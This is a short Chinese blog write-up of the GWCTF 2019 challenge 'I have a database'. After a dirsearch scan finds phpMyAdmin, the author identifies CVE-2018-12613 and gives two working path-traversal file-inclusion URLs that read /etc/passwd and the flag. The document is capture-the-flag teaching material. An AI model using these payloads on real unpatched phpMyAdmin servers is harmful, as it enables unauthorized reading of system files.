[GWCTF 2019]我有一个数据库

双层小牛堡2023-09-12 23:45

过来毛都没有

直接dirsearch 扫一下

发现存在 phpadmin 我们直接访问一下

啥都没有 但是给我们了 phpadmin的版本

我们去搜搜看是否存在漏洞

phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)_phpmyadmin cve-2018-12613漏洞获取webshell_zhang三的博客-CSDN博客

发现还真有 我们直接复现即可

复制代码 
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
复制代码 
phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag
相关推荐
dalerkd10 小时前
忙里偷闲叙-谈谈最近两年
网络·安全·web安全
牛三金11 小时前
匿踪查询沿革-Private Information Retrieval(PIR)
算法·安全
xixixi7777712 小时前
量子通信是当前信息安全和通信领域最前沿、最具变革性的技术之一
安全·信息安全·量子计算·通信·量子通信·密钥·传输
WLJT12312312312 小时前
守护自然与滋养民生的绿色之路
大数据·安全
C++ 老炮儿的技术栈13 小时前
什么是通信规约
开发语言·数据结构·c++·windows·算法·安全·链表
五仁火烧13 小时前
生产环境中配置了接口3000后,不能启动,改成8080后就可以
linux·网络·安全·vue
专业开发者13 小时前
借助安全返场方案提升智慧建筑能效的新机遇
物联网·安全
菩提小狗14 小时前
Sqlmap双击运行脚本,双击直接打开。
前端·笔记·安全·web安全
●VON15 小时前
跨模态暗流:多模态安全攻防全景解析
人工智能·学习·安全·von
廋到被风吹走16 小时前
【Spring】Spring Boot 配置管理深度指南:Profile、类型安全与加密
spring boot·安全·spring
热门推荐
01GitHub 镜像站点02Labelme从安装到标注:零基础完整指南03Linux下V2Ray安装配置指南04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05jdk21下载、安装(Windows、Linux、macOS)06Claude Code 2.1.2 升级报错?别折腾了,一行命令搞定07KGG转MP3工具|非KGM文件|解密音频08【踩坑笔记】50系显卡适配的 PyTorch 安装092025-04-03 Latex学习1——本地配置Latex + VScode环境10UV安装并设置国内源